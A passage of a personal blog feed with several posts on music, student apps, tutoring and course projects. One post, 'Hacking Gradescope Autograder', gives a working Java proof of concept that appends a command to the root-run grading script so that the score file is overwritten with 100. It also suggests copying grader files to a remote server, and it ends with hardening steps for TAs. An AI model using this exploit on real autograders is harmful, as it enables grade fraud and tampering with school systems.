<div style="font-size: 10px; color: #cccccc;line-break: anywhere;word-break: normal;overflow: hidden;white-space: nowrap;text-overflow: ellipsis; font-family: Interstate,Lucida Grande,Lucida Sans Unicode,Lucida Sans,Garuda,Verdana,Tahoma,sans-serif;font-weight: 100;"><a href="https://soundcloud.com/user-906245806" title="Music 70" target="_blank" style="color: #cccccc; text-decoration: none;">Music 70</a> · <a href="https://soundcloud.com/user-906245806/hanbang-wang-over-the-rainbow" title="Hanbang Wang - Over the Rainbow" target="_blank" style="color: #cccccc; text-decoration: none;">Hanbang Wang - Over the Rainbow</a></div>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Music" /><category term="Composition" /><summary type="html"><![CDATA[Here are some of my compositions in music.]]></summary></entry><entry><title type="html">Hacking Gradescope Autograder</title><link href="http://0.0.0.0/blog/hack-gs/" rel="alternate" type="text/html" title="Hacking Gradescope Autograder" /><published>2019-12-27T10:00:00-05:00</published><updated>2019-12-27T10:00:00-05:00</updated><id>http://0.0.0.0/blog/hack-gs</id><content type="html" xml:base="http://0.0.0.0/blog/hack-gs/"><![CDATA[<p>So yeah, every script-kiddie has this little dream of hacking his own school to get a perfect score. 
<!--more--></p>

<p><img src="/assets/images/gs-hack/screenshot.jpg" alt="Autograder HACKED" /></p>

<h1 id="prologue">Prologue</h1>

<p><a href="https://www.gradescope.com/">Gradescope</a> is an online grading platform for schools, founded by an instructor at UC Berkeley, which has long been exposed with some security issues by guys from MIT as their final course project<sup><a href="https://courses.csail.mit.edu/6.857/2016/files/20.pdf">[1]</a></sup>.</p>

<p>Me, on the other hand, just wanna realize my dream to hack my score when things hit me hard.</p>

<p>Now, although the MIT guys had already done a lot, including showing that we can directly <strong>read the source code of autograder and uploads it to a remote server</strong> (details on the paper, section 5.3.2, or down below). But they failed to achieve the final step, which obviously is to change one’s score freely.</p>

<h2 id="disclaimer">Disclaimer</h2>

<p>Now before you continue:</p>

<p>The following content and all associated programming code (“this work”) are written and developed under the notion for only educational and research purposes. Using this work in an uncontrolled production environment, without the permission of the owner of the autograder, may result in breaking Gradescope’s Terms of Use, and may potentially violate your affiliation’s Code of Conduct. Under no circumstances should I be liable for any misuse of this work.</p>

<h2 id="details">Details</h2>

<p>First a little recap. The following is a rough flowchart of how a general Gradescope autograder works:</p>

<p><img src="/assets/images/gs-hack/flowchart.svg" alt="Autograder Flowchart" /></p>

<p>The line in red indicates where our code will start running. Anything before this is totally uncontrollable without having an administrate privilege (being an instructor or have control over Gradescope’s server).</p>

<p>It seems that we have ruled out many potential options. However, due to the nature of Gradescope’s autograder, <code class="language-plaintext highlighter-rouge">run_autograder</code> is executed with root permission. This means that anything that runs directly as a child process of <code class="language-plaintext highlighter-rouge">run_autograder</code> owns root.</p>

<p>Our submitted code now has the root permission, and this opens up a whole new door towards arbitrary code execution.</p>

<h1 id="exploitation">Exploitation</h1>

<p>With the power of root, we can literally traverse through all the files on the server (more specifically in Docker, without a sandbox escape exploit), and upload them to a remote server controlled by the user, since we also have Internet access.</p>

<p>Normies would stop here and say, “well we have the test cases just study them and debug your code.” <strong>ⒻⒶⒸⓉ</strong>, but not enough. As a TA myself, I tend to write large random fuzzing tests that generate stuff no one understands. Therefore, we need the power to change the scores directly.</p>

<h2 id="direct-output">Direct Output</h2>

<p>The first thing comes to mind is to directly write to the output <code class="language-plaintext highlighter-rouge">results.json</code>. Since the path to it is absolutely fixed (<code class="language-plaintext highlighter-rouge">/autograder/results/results.json</code>), and we know the format of the output by the <a href="https://gradescope-autograders.readthedocs.io/en/latest/specs/#output-format">documentation</a>. Seems that all we need to do is to write to the file directly and that’s it.</p>

<p>However, take a look at the flowchart and you will realize that the <code class="language-plaintext highlighter-rouge">results.json</code> is written by the <code class="language-plaintext highlighter-rouge">run_autograder</code> <strong>after</strong> the test is finished. This means whatever we wrote to the file would get overwritten by the real autograder results.</p>

<p>This <em>seems</em> to have an easy fix. After our code writes to the file, just set the file to immutable so that the real autograder cannot overwrite it. The problem here is, Docker by default runs without <code class="language-plaintext highlighter-rouge">LINUX_IMMUTABLE</code> capability, so even if you set the file to be unwritable by anyone with <code class="language-plaintext highlighter-rouge">chmod</code>, the file still can be overwritten.</p>

<p>This is a no-go.</p>

<h2 id="direct-submission">Direct Submission</h2>

<p>Following the path on the flow chart, the next thing meets my eye is the procedure where <code class="language-plaintext highlighter-rouge">harness.py</code> would upload the result via an HTTP POST request. If Gradescope would automatically accept and parse the first result comes in, potentially it may ignore any following request.</p>

<p>Now the thing would be to send an HTTP request to the URL for submitting the result. Look into the source code of <code class="language-plaintext highlighter-rouge">harness.py</code>, it turns out the URL is acquired from the environment variables. Everything seems to be going well, the user code can successfully get the URL from env, but the HTTP request simply is not OK.</p>

<p>A deeper look into source code showed that there needs to be an authentication token in the header along with the request. Although the token is acquired from the environment variables as well, Gradescope developers actually paid attention to this little detail and delete the environment variable after it is loaded. The result is that any child process of <code class="language-plaintext highlighter-rouge">harness.py</code> would not be able to get that environment variable.</p>

<p>What a pity.</p>

<h4 id="thoughts">thoughts…</h4>

<p>When writing this, it comes to me that we could spin up a fake web server that MITM the submission. We can set HOSTS for the URL to be a loopback address and make <code class="language-plaintext highlighter-rouge">harness.py</code> hit our fake server, change the payload, and forward it to the real remote server.</p>

<p>A detail needs to be taken care of is that the URL uses HTTPS protocol, meaning that we have to generate a self-signed certificate and trust it locally. I’m not quite sure how Python’s HTTP library works and should it loads the cert in time or caches it. Nonetheless, this could potentially work.</p>

<p>Also, there could be other methods to extract the authentication token, such as dumping the memory of the running <code class="language-plaintext highlighter-rouge">harness.py</code> script and do a search in it. But that could be way too hardcore for our script-kiddie oriented write-up here.</p>

<h2 id="bottleneck">Bottleneck</h2>

<p>We need to make sure <code class="language-plaintext highlighter-rouge">results.json</code> is changed after the real results are being outputted, but before the <code class="language-plaintext highlighter-rouge">results.json</code> is read and upload by <code class="language-plaintext highlighter-rouge">harness.py</code>. Look at the flowchart this does not leave us much space. This also seems to be an impossible job—<code class="language-plaintext highlighter-rouge">results.json</code> is written after our code finishes executing, but how could we do anything if our code is no longer running?</p>

<p>Naturally, we need some kind of delayed device, that would still work after our code exits. I tried <code class="language-plaintext highlighter-rouge">cron</code> and <code class="language-plaintext highlighter-rouge">sleep</code>, both of them are polling-based and need precise timing, doesn’t seem to work well in this scenario (maybe just bad luck for me).</p>

<h4 id="thoughts-1">thoughts…</h4>

<p>When writing this, it comes to me that we can use <code class="language-plaintext highlighter-rouge">inotify</code>-related utilities to watch for the change of the <code class="language-plaintext highlighter-rouge">results.json</code> file, which turns the scenario into an interrupts-driven case. If fast enough, we may squeeze in the time between the <code class="language-plaintext highlighter-rouge">run_autograder</code> writes the file and <code class="language-plaintext highlighter-rouge">harness.py</code> reads the file to make the change.</p>

<h2 id="a-new-light">A New Light</h2>

<p>All hopes seem gone, although you might already notice the larger-in-size arrow in the flowchart. It is after the autograder result is written to <code class="language-plaintext highlighter-rouge">results.json</code>, but before <code class="language-plaintext highlighter-rouge">run_autograder</code> exits. it would be perfect if we can do something at this time, but how?</p>

<p>It can’t help but to think, can we make <code class="language-plaintext highlighter-rouge">run_autograder</code> do things we want it to do? At first glance, this is implausible, as <code class="language-plaintext highlighter-rouge">run_autograder</code> is written by the instructors and is there before our code starts running. This is true for almost all executables, since it is impossible to change the instruction of a running file (without considering some hardcore injection, that is). This is also why we can’t directly change <code class="language-plaintext highlighter-rouge">harness.py</code> to make it do what we want.</p>

<p>But <code class="language-plaintext highlighter-rouge">run_autograder</code> is an exception. Although in the documentation it says that <code class="language-plaintext highlighter-rouge">run_autograder</code> could be any type of executables files, since the examples provided by Gradescope is written as a shell script, many autograders follows the path.</p>

<p>What’s wrong about shell scripts? Well, shell scripts are executed line by line, which means that if we <strong>append new lines to the script before it is finished, the new line would get executed</strong>. As <code class="language-plaintext highlighter-rouge">run_autograder</code> also has a fixed path, it makes our life <em>tremendously easier</em>. What we are left to do is to append the commands we want it to execute to the end of the file, and that’s it.</p>

<h2 id="the-final-payload">The Final Payload</h2>

<p>I decided to actually extract a python script to the <code class="language-plaintext highlighter-rouge">/autograder/exploit.py</code>, and then append a single line <code class="language-plaintext highlighter-rouge">python /autograder/exploit.py</code> to the end of <code class="language-plaintext highlighter-rouge">run_autograder</code>. The following is the POC code I used for a Java autograder. I also tried with a Python autograder, which works fine as well. Other autograders, as long as they are using a shell script as <code class="language-plaintext highlighter-rouge">run_autograder</code> file, theoretically should work as well.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">java.io.IOException</span><span class="o">;</span>
<span class="kn">import</span> <span class="nn">java.nio.file.Files</span><span class="o">;</span>
<span class="kn">import</span> <span class="nn">java.nio.file.Path</span><span class="o">;</span>
<span class="kn">import</span> <span class="nn">java.nio.file.Paths</span><span class="o">;</span>
<span class="kn">import</span> <span class="nn">java.nio.file.StandardOpenOption</span><span class="o">;</span>

<span class="kd">public</span> <span class="kd">class</span> <span class="nc">Submission</span> <span class="o">{</span>
    <span class="kd">public</span> <span class="kd">static</span> <span class="kt">void</span> <span class="nf">question1</span><span class="o">()</span> <span class="o">{</span>
        <span class="kd">final</span> <span class="nc">String</span> <span class="n">exploit</span> <span class="o">=</span> <span class="s">"import json\n"</span> <span class="o">+</span>
                <span class="s">"with open('/autograder/results/results.json', 'w') as f:\n"</span> <span class="o">+</span>
                <span class="s">"    f.write('{\"score\": 100.0}')"</span><span class="o">;</span>
        <span class="kd">final</span> <span class="nc">Path</span> <span class="n">exploitPath</span> <span class="o">=</span> <span class="nc">Paths</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="s">"/autograder/exploit.py"</span><span class="o">);</span>
        <span class="k">if</span> <span class="o">(</span><span class="nc">Files</span><span class="o">.</span><span class="na">notExists</span><span class="o">(</span><span class="n">exploitPath</span><span class="o">))</span> <span class="o">{</span>
            <span class="kd">final</span> <span class="nc">Path</span> <span class="n">agPath</span> <span class="o">=</span> <span class="nc">Paths</span><span class="o">.</span><span class="na">get</span><span class="o">(</span><span class="s">"/autograder/run_autograder"</span><span class="o">);</span>
            <span class="k">try</span> <span class="o">{</span>
                <span class="nc">Files</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">agPath</span><span class="o">,</span> <span class="s">"\npython /autograder/exploit.py"</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(),</span>
                        <span class="nc">StandardOpenOption</span><span class="o">.</span><span class="na">APPEND</span><span class="o">);</span>
                <span class="nc">Files</span><span class="o">.</span><span class="na">write</span><span class="o">(</span><span class="n">exploitPath</span><span class="o">,</span> <span class="n">exploit</span><span class="o">.</span><span class="na">getBytes</span><span class="o">(),</span>
                        <span class="nc">StandardOpenOption</span><span class="o">.</span><span class="na">WRITE</span><span class="o">,</span> <span class="nc">StandardOpenOption</span><span class="o">.</span><span class="na">CREATE</span><span class="o">);</span>
            <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">IOException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span>
                <span class="n">e</span><span class="o">.</span><span class="na">printStackTrace</span><span class="o">();</span>
            <span class="o">}</span>
        <span class="o">}</span>
    <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>

<p>This is a POC exploit that overwrites the real autograder output and set the score to 100, which assumes <code class="language-plaintext highlighter-rouge">Submission.question()</code> will be invoked somewhere during the tests.</p>

<h1 id="prevention">Prevention</h1>

<p>By the paper written by the MIT guys, this problem should exist back in 2016 when autograder was still in beta. Based on this I guess Gradescope developers are not going to fix it anytime soon.</p>

<p>Hence, the responsibility to prevent students from using this exploit to achieve perfect scores lays on the shoulder of our TAs.</p>

<p>The fix is rather easy:</p>

<ul>
  <li>
    <p>Create a new user account, say <code class="language-plaintext highlighter-rouge">runner</code>, that is <em>not</em> in the sudoers.</p>

    <p>(e.g. <code class="language-plaintext highlighter-rouge">sudo adduser runner --no-create-home --disabled-password --gecos ""</code>)</p>
  </li>
  <li>
    <p>Set all the files and folders with sensitive data (<code class="language-plaintext highlighter-rouge">run_autograder</code>, <code class="language-plaintext highlighter-rouge">results/</code>, source codes, etc.) to be inaccessible by other users. (e.g. <code class="language-plaintext highlighter-rouge">chmod o= &lt;file&gt;</code>)</p>

    <p>However, make sure that the compiled executables or bytecode files (like <code class="language-plaintext highlighter-rouge">.class</code> for Java and <code class="language-plaintext highlighter-rouge">.pyc</code> for Python), and all related files are still accessible by the other users.</p>
  </li>
  <li>
    <p>Then, when running test suites, run as the user <code class="language-plaintext highlighter-rouge">runner</code>.</p>

    <p>(e.g. before the line, add <code class="language-plaintext highlighter-rouge">sudo -u runner</code>)</p>
  </li>
</ul>

<p>And this should fix the problem.</p>

<p>This also prevents the student from seeing the source code. Although they could still upload the compiled files and decompile them, this should increase the difficulty a lot.</p>

<p>If your test suites do not need network access and stdouts, you could potentially kill them as well, so that your autograder would truly become a black box for any student-submitted code.</p>

<h1 id="epilogue">Epilogue</h1>

<p>Honestly, Gradescope is lacking a lot of useful features that are considered essential for us TAs who use Gradescope for everything from homework to exams grading (like there’s even no mutually exclusive lock for grading). The situation is not any better after being acquired by TurnItIn.</p>

<p>If someday I’m tired of dealing with it, I’ll write a new online grading platform myself.</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="Network" /><category term="Gradescope" /><category term="Autograder" /><category term="Script" /><summary type="html"><![CDATA[So yeah, every script-kiddie has this little dream of hacking his own school to get a perfect score.]]></summary></entry><entry><title type="html">Penn Automate</title><link href="http://0.0.0.0/blog/penn-automate/" rel="alternate" type="text/html" title="Penn Automate" /><published>2019-04-12T19:00:00-04:00</published><updated>2019-04-12T19:00:00-04:00</updated><id>http://0.0.0.0/blog/penn-automate</id><content type="html" xml:base="http://0.0.0.0/blog/penn-automate/"><![CDATA[<p><img src="/assets/images/pennmate/pennmate.png" alt="Penn Automate" width="200" /></p>

<p>Main Page: <a href="https://pennmate.com">pennmate.com</a>
Github Page: <a href="https://github.com/penn-automate">Penn Automate</a><br />
LinkedIn Page: <a href="https://www.linkedin.com/company/penn-automate">Penn Automate | LinkedIn</a></p>

<h2 id="introduction">Introduction</h2>

<p>On that special day, I missed twice the email from <a href="http://www.penncoursenotify.com">PennCourseNotify</a> and <a href="https://penncoursealert.com">PennCourseAlert</a> for EAS-203, so I was <em>a bit</em> angry.</p>

<p>This is when the idea of Penn Automate comes up. Penn Automate stands for a series of simple apps that help Penn students automating tasks that are usually repetitive or hard for humans.</p>

<p>Penn Automate is usually abbreviated to <strong>Pennmate</strong> as a prefix to all apps affiliated with this project. This project is planned to be fully open-sourced on Github.</p>

<p>The website for this project is still under construction by the time you see this post, but it is planned to be created in the next few weeks, depends on the feedback given to the <a href="#pennmate-notify">first app</a>.</p>

<h2 id="technical-details">Technical Details</h2>

<p>The server is hosted on AWS Lightsail.</p>

<p>The main backend is written in PHP with Nginx as webserver and MySQL as database.</p>

<p>Go is used for microservices, snippets, and daemons to assist with the services.</p>

<p>Flutter and Dart is used for writing mobile Apps. Other cross-platform frameworks such as React Native is in consideration.</p>

<p>Bootstrap and jQuery is the framework currently used for front-end projects.</p>

<h1 id="mobile-apps">Mobile Apps</h1>

<h2 id="pennmate-notify">Pennmate Notify</h2>

<p><img src="/assets/images/pennmate/pennmate-notify.png" alt="Pennmate Notify" width="200" /></p>

<p>Github page: <a href="https://github.com/penn-automate/pennmate-notify-app">Pennmate Notify App</a></p>

<p>The notification by email is not stupid—it’s just slow. The process of sending emails is not concurrent; The email would take much more time to actually arrive at your inbox; Massive emails from the same address could trigger anti-spam; The message might simply won’t pop-up, or easily mixed with other of your emails.</p>

<p>Also, there will be privacy concerns if you give out your email and the course you want to be in at the same time. The data could be easily correlated to your individual identity and used to figure out how you planned your schedule. I heard<sup>[<i>citation needed</i>]</sup> that PennLabs is already doing this when you fill in your course on Penn Mobile.</p>

<p>So now forget about all that and embrace <strong>Pennmate Notify</strong>. An app that pushed simplicity and functionality to its maximum and does nothing other than telling you the course is open at the shortest notice.</p>

<h3 id="download">Download</h3>

<p>Google Play: <a href="https://play.google.com/store/apps/details?id=edu.hanbangw.pennmate_notify">Pennmate Notify - Apps on Google Play</a>.</p>

<p>This app is written in <a href="https://www.dartlang.org/">Dart</a> and uses the <a href="https://flutter.dev/">Flutter</a> framework. It is natively a cross-platform app, meaning that it can run on both iOS and Android devices.</p>

<p>Unfortunately, it is not possible to install an app from an unknown source on unjailbreaked iOS devices. The only way for me is to obtain a developer account from Apple, which would cost me $99/yr. <small>im cute plz give me money</small></p>

<h1 id="browser-extension">Browser Extension</h1>

<h2 id="pennmate-notify-1">Pennmate Notify</h2>

<p>Github page: <a href="https://github.com/penn-automate/pennmate-notify-chrome">Pennmate Notify Chrome</a><br />
Download: <a href="https://chrome.google.com/webstore/detail/pennmate-notify/gmblmifibabhknlefcohofgpnbelleki">Pennmate Notify - Chrome Web Store</a></p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="Network" /><category term="Pennmate" /><summary type="html"><![CDATA[Penn Automate is a personal project started by me one day when not paying attention to NETS class.]]></summary></entry><entry><title type="html">Free Tutoring</title><link href="http://0.0.0.0/blog/free-tutoring/" rel="alternate" type="text/html" title="Free Tutoring" /><published>2019-01-22T18:40:00-05:00</published><updated>2019-01-22T18:40:00-05:00</updated><id>http://0.0.0.0/blog/free-tutoring</id><content type="html" xml:base="http://0.0.0.0/blog/free-tutoring/"><![CDATA[<p>Starting from Fall 2019, I work under <a href="https://www.vpul.upenn.edu/tutoring/" target="_blank">The Tutoring Center</a>. It is one of three offices within the Weingarten Learning Resources Center, offers Penn undergraduate students free, accessible, and convenient options to supplement their academic experience. Tutoring is available one-on-one and in groups, by appointment and walk-in.</p>

<hr />

<h1 id="introduction">Introduction</h1>

<p>Free tutoring by me is now open for anyone in Penn studying computer science or related science and technology. You can ask questions over the email, or come to my room with the address and during the time said below.</p>

<p>I’d love to teach anything relates to or answer question about computer science, including software and hardware, PC problem and server maintenence, algorithms and debugging, programming languages and so forth.</p>

<p>Apart from CS, I can also teach Native Mainland Mandarin™, if that’s what you need.</p>

<p>I also like music, games, and Japanese anime. If you want to find a person with whom you can discuss those, you are also very welcomed.</p>

<p>Sending me an email with the time you want to come by at least 30 minutes before is appreciated, and I will reply if I’m free. Walk-in is also appreciated, but you simply may not find me.</p>

<p>Again, this whole tutoring thing is completely free!</p>

<h1 id="address-and-timeslots">Address and Timeslots</h1>

<h2 id="spring-2019">Spring 2019</h2>

<ul>
  <li>Wednesday, 11:00 A.M. - 8:00 P.M.</li>
  <li>Friday/Saturday, 10:00 A.M. - 10:00 P.M.</li>
  <li>Sunday, 10:00 A.M. - 8:00 P.M.</li>
</ul>

<p>Room 310, Van Pelt, Gregory</p>

<h2 id="fall-2019spring-2020">Fall 2019/Spring 2020</h2>

<p>I tutor CIS 120 and CIS 160 in these semesters. For more information please refer to The Tutoring Center.</p>

<h2 id="fall-2020spring-2021">Fall 2020/Spring 2021</h2>

<p>Temporarily stopped tutoring as remote learning is taking a toll on everyone.</p>

<h2 id="summer-2021">Summer 2021</h2>

<p>Contact me via email and we can do remote learning, yay!</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Tutoring" /><summary type="html"><![CDATA[Introducing free tutoring.]]></summary></entry><entry><title type="html">Public Chat Server</title><link href="http://0.0.0.0/blog/cis120-chat/" rel="alternate" type="text/html" title="Public Chat Server" /><published>2018-11-05T00:30:00-05:00</published><updated>2018-11-05T00:30:00-05:00</updated><id>http://0.0.0.0/blog/cis120-chat</id><content type="html" xml:base="http://0.0.0.0/blog/cis120-chat/"><![CDATA[<p>I just created a public server that you can all connect to using the given client <code class="language-plaintext highlighter-rouge">hw07-client.jar</code>.</p>

<!--more-->
<p><em>Updated 12/15/2018</em>: The server is off, thank you!</p>

<hr />

<p>The server address is <code class="language-plaintext highlighter-rouge">chat.hbang.wang</code>, just type it in when you boot up the client.</p>

<p>You will join a channel <code class="language-plaintext highlighter-rouge">All</code> by default, and you can’t leave the channel unless you quit the client.</p>

<p>Due to the limitation of the parser, all nicknames and channel names can’t have spaces<br />
(and of course other names that can’t pass <code class="language-plaintext highlighter-rouge">isValidName</code>).</p>

<p>This is also a good place for you to figure out expected behaviors of the actions.</p>

<p>Have fun! And if you have any other questions feel free to comment down below.</p>

<p><img src="/assets/images/chat/with-swap.png" alt="Chat with Swap" /></p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="CIS" /><category term="CIS120" /><category term="Java" /><category term="Server" /><summary type="html"><![CDATA[I just created a public server that you can all connect to using the given client hw07-client.jar.]]></summary></entry><entry><title type="html">Rajivelized Paint</title><link href="http://0.0.0.0/blog/cis120-paint/" rel="alternate" type="text/html" title="Rajivelized Paint" /><published>2018-10-27T02:50:00-04:00</published><updated>2018-10-27T02:50:00-04:00</updated><id>http://0.0.0.0/blog/cis120-paint</id><content type="html" xml:base="http://0.0.0.0/blog/cis120-paint/"><![CDATA[<h2 id="gui-in-ocaml">GUI in OCaml?</h2>

<p>This is the second most ridiculous thing I’ve heard since the dawn of civilization—the first is inventing Node.js.</p>

<!--more-->
<p>Well, obviously they had it compile to a desktop program for a few iterations of this class before, so we had all kinds of crappy serif-typeface font with awful interface design that doesn’t even match the aesthetic of Windows® 98.</p>

<p>Luckily we have JavaScript now, which is capable of interpreting ANYTHING. The typeface was changed to sans-serif, and now we have a <code class="language-plaintext highlighter-rouge">&lt;canvas&gt;</code> and <code class="language-plaintext highlighter-rouge">ocaml_to_js</code>, everything is beautiful now.</p>

<p><strong>NO!</strong> The code itself is disgusting! Asking for a strict coding style while the provided code is unformatted and like a bunch of crap mixing together (a part of this attributes to the <code class="language-plaintext highlighter-rouge">Graphics</code> module).</p>

<p>It resulted in me manually reading the code and fixing a dozen of bugs, including the canvas won’t redraw unless user making an detectable movement, and the repaint function is invoked before making the change, making the canvas is always one frame behind.</p>

<p>Anyway, I have resolved most of the problems and updated related libraries, now we’re good to go.</p>

<h1 id="rajivelization">Rajivelization</h1>

<p align="center">
	<img alt="Rajiv in Paint" src="/assets/images/paint/demo.png" />
</p>

<h2 id="original-flavor">Original Flavor</h2>

<h3 id="generate-bitmap">Generate Bitmap</h3>

<p>Unfortunately <code class="language-plaintext highlighter-rouge">Graphics</code> module is too incapable that we can’t put a PNG file into it. Therefore, after cutout Rajiv in Photoshop (one of the purest software in the world, $20 a month w/ student discount, instant own), I wrote a little Go program to transform the PNG file with alpha channel into a <code class="language-plaintext highlighter-rouge">(int * int * int) option list list</code>, where <code class="language-plaintext highlighter-rouge">None</code> means transparent (of course I could use some <code class="language-plaintext highlighter-rouge">(-1, -1, -1)</code> to represent it, tHaT’S nOt elEgaNt).</p>

<p>The psuedo-code is as follows:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>file := open_png(png_file)
bmp := bitmap(file)

print("let rajiv : (int * int * int) option list list = [")
for j := 0...height(bmp)
  print("[")
  for i := 0...width(bmp)
    r, g, b, a := rgba(bmp[i][j])
    if a = 0 then print("None;")
    else print("Some(r,g,b);")
  print("];")
print("]")
</code></pre></div></div>

<p>Now create a new <code class="language-plaintext highlighter-rouge">rajiv.ml</code> file and put the printed code above into it, we’ve done generating the bitmap needed for the program.</p>

<h3 id="first-attempt">First Attempt</h3>

<p>The first attempt is done by a quick try of <code class="language-plaintext highlighter-rouge">Graphics.plot</code> method. The <code class="language-plaintext highlighter-rouge">plot</code> function simply draws a pixel with a given color at a certain location. By the way, that handsome photo of Mr. Rajiv was resized to 100x100px, so every time the program has to draw ten thousand pixels individually. <em>Every time</em> here means every movement including <code class="language-plaintext highlighter-rouge">MouseMove</code>. The following code is a simple implementation of the idea.</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">List</span><span class="p">.</span><span class="n">iteri</span> <span class="p">(</span><span class="k">fun</span> <span class="n">i</span> <span class="n">l</span> <span class="o">-&gt;</span>
  <span class="nn">List</span><span class="p">.</span><span class="n">iteri</span> <span class="p">(</span><span class="k">fun</span> <span class="n">j</span> <span class="n">c</span> <span class="o">-&gt;</span>
    <span class="k">match</span> <span class="n">c</span> <span class="k">with</span>
    <span class="o">|</span> <span class="nc">None</span> <span class="o">-&gt;</span> <span class="bp">()</span>
    <span class="o">|</span> <span class="nc">Some</span> <span class="p">(</span><span class="n">r'</span><span class="o">,</span> <span class="n">g'</span><span class="o">,</span> <span class="n">b'</span><span class="p">)</span> <span class="o">-&gt;</span>
      <span class="nn">Graphics</span><span class="p">.</span><span class="n">set_color</span> <span class="p">(</span><span class="nn">Graphics</span><span class="p">.</span><span class="n">rgb</span> <span class="n">r'</span> <span class="n">g'</span> <span class="n">b'</span><span class="p">);</span>
      <span class="nn">Graphics</span><span class="p">.</span><span class="n">plot</span> <span class="p">(</span><span class="n">x</span> <span class="o">-</span> <span class="n">j</span><span class="p">)</span> <span class="p">(</span><span class="n">y</span> <span class="o">-</span> <span class="n">i</span><span class="p">)</span>
  <span class="p">)</span> <span class="n">l</span>
<span class="p">)</span> <span class="nn">Rajiv</span><span class="p">.</span><span class="n">rajiv</span>
</code></pre></div></div>

<p>This is clearly not a solution: the third Rajiv drawn made the whole interface stuck, and the user is impossible to make any move.</p>

<h3 id="alternative-method">Alternative Method</h3>

<p>Looking for alternatives in the documentation, I found an interesting method called <code class="language-plaintext highlighter-rouge">Graphics.draw_image</code>, which takes an <code class="language-plaintext highlighter-rouge">Graphics.image</code> and draws it at a position. With the hope that this would function well, I look for the function that would generate one, which is <code class="language-plaintext highlighter-rouge">make_image</code>. It takes a <code class="language-plaintext highlighter-rouge">Graphics.color array array</code> and turn it into an <code class="language-plaintext highlighter-rouge">image</code>. Notice that we also have <code class="language-plaintext highlighter-rouge">Graphics.transp</code> as a transparent color. This is exactly what we’re looking for!</p>

<p>Although in class we only learn <code class="language-plaintext highlighter-rouge">list</code>, it is easy to transfer them to <code class="language-plaintext highlighter-rouge">array</code> since we have <code class="language-plaintext highlighter-rouge">Array.of_list</code>. A list map call is enough:</p>

<div class="language-ocaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nn">Graphics</span><span class="p">.</span><span class="n">make_image</span> <span class="p">(</span><span class="nn">Array</span><span class="p">.</span><span class="n">of_list</span> <span class="p">(</span>
  <span class="nn">List</span><span class="p">.</span><span class="n">map</span> <span class="p">(</span><span class="k">fun</span> <span class="n">l</span> <span class="o">-&gt;</span>
    <span class="nn">Array</span><span class="p">.</span><span class="n">of_list</span> <span class="p">(</span>
       <span class="nn">List</span><span class="p">.</span><span class="n">map</span> <span class="p">(</span><span class="k">fun</span> <span class="n">c</span> <span class="o">-&gt;</span>
         <span class="k">match</span> <span class="n">c</span> <span class="k">with</span>
         <span class="o">|</span> <span class="nc">None</span> <span class="o">-&gt;</span> <span class="nn">Graphics</span><span class="p">.</span><span class="n">transp</span>
         <span class="o">|</span> <span class="nc">Some</span> <span class="p">(</span><span class="n">r'</span><span class="o">,</span> <span class="n">g'</span><span class="o">,</span> <span class="n">b'</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nn">Graphics</span><span class="p">.</span><span class="n">rgb</span> <span class="n">r'</span> <span class="n">g'</span> <span class="n">b'</span>
       <span class="p">)</span> <span class="n">l</span>
    <span class="p">)</span>
  <span class="p">)</span> <span class="nn">Rajiv</span><span class="p">.</span><span class="n">rajiv</span>
<span class="p">))</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">draw_image</code> is way faster than <code class="language-plaintext highlighter-rouge">plot</code>. However, every time* the program has to turn a two-dimensional list into a 2D array, which is SUPER laggy. The image will flash every time* we make a move. This is somehow still not acceptable.</p>

<h3 id="optimization">Optimization</h3>

<p>The optimization is easy through caching. We just need to store the converted image somewhere so that we don’t have to <code class="language-plaintext highlighter-rouge">make_image</code> every time*. It is easier said than done though, since <code class="language-plaintext highlighter-rouge">make_image</code> can’t be invoked at the beginning of the runtime when <code class="language-plaintext highlighter-rouge">Graphics</code> module are not initialized yet.</p>

<p>Luckily values in OCaml are not fully immutable. We then can create a <code class="language-plaintext highlighter-rouge">image option ref</code> and initialize it to be <code class="language-plaintext highlighter-rouge">ref None</code> first. For the first time we just generate the image from bitmap during runtime, and every time* after just take from the cache, and we’re good to go. The problem then is solved, the Rajivs are drawn with extreme smooth.</p>

<p align="center">
	<img alt="Smooth Rajiv in Paint" src="/assets/images/paint/demo2.png" />
</p>

<h2 id="chromajiv">Chromajiv</h2>

<p>Rajiv needs to be colorful, just as our lives. My idea was to use color sliders as an offset of the photo’s original color, specifically \(RGB_{new} = \left(RGB_{old} + RGB_{offset}\right) \mod 256\).</p>

<p>We can’t perform the exact optimization this time since color changes, and we only stored one image (w/ original color) for Rajiv. However, we can use a database-like structure to store a key-value pair, where key is the offset color, and value is the image with the offset color. The best thing for database is for sure a map.</p>

<p>OCaml provided a <code class="language-plaintext highlighter-rouge">Map.Make</code> function for us to make a map with custom comparable key type and generic value type. We could, of course, take key as an <code class="language-plaintext highlighter-rouge">int</code> tuple, but that would be less efficient. With a second look, <code class="language-plaintext highlighter-rouge">Graphics.color</code> is an alias of <code class="language-plaintext highlighter-rouge">int</code>, where the color is stored in <code class="language-plaintext highlighter-rouge">0xRRGGBB</code> way. This is a classical example of bit compression. After knowing that, we can get ourselves a beautiful <code class="language-plaintext highlighter-rouge">IntMap</code>.</p>

